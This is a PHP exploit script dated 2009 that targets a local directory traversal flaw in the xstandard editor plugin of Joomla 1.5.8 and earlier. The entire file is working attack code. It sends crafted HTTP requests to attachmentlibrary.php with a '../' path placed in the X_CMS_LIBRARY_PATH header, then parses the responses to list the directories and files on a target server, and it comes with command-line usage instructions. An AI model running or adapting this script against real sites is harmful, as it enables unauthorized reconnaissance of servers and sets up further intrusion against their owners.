joomla-traversal.txt
Posted on 07 January 2009
<?php /* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability discovered by: irk4z[at]yahoo.pl greets: all friends ;) */ echo "* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vuln "; echo "* discovered by: irk4z[at]yahoo.pl "; echo "* "; echo "* greets: all friends ;) enjoy! "; echo "*------------------------------------------------------------------* "; $host = $argv[1]; $path = $argv[2]; $folder = $argv[3]; if (empty($host) || empty($path)) { echo "usage: php {$argv[0]} <host> <path> [<folder>] "; echo " php {$argv[0]} example.org /joomla "; echo " php {$argv[0]} example.org /joomla ../../ "; exit; } echo "http://" . $host . $path . "/images/stories/ "; if ( empty($folder) ){ $lev = "./"; for( $i = 0; $i <= 7; $i++ ) { echo browseFolder($host, $path, $lev); $lev .= "../"; } } else { echo browseFolder($host, $path, $folder); } function browseFolder($host, $path, $folder){ $packet = "GET {$path}/plugins/editors/xstandard/attachmentlibrary.php HTTP/1.1 "; $packet .= "Host: {$host} "; $packet .= "X_CMS_LIBRARY_PATH: {$folder} "; $packet .= "Connection: Close "; $o = @fsockopen($host, 80); if(!$o){ echo " [x] No response... "; die; } fputs($o, $packet); while (!feof($o)) $data .= fread($o, 1024); fclose($o); $_404 = strstr( $data, "HTTP/1.1 404 Not Found" ); if ( !empty($_404) ){ echo " [x] 404 Not Found... Maybe wrong path? "; die; } //folders preg_match_all("/<baseURL>([^<]+)</baseURL>/", $data, $matches); //files preg_match_all("/<value>([^<]+.[^<]{3,4})</value>/", $data, $matches2); $matches = array_merge( $matches[1], $matches2[1] ); if ( empty($matches) ){ $ret = "$folder [x] Failed... "; } else { $ret = ''; foreach( $matches as $tmp){ $ret .= str_replace("images/stories/", '', str_replace("/./", "/", str_replace("//", "/", urldecode($tmp) ) ) ) . " "; } } return ($ret); } ?>
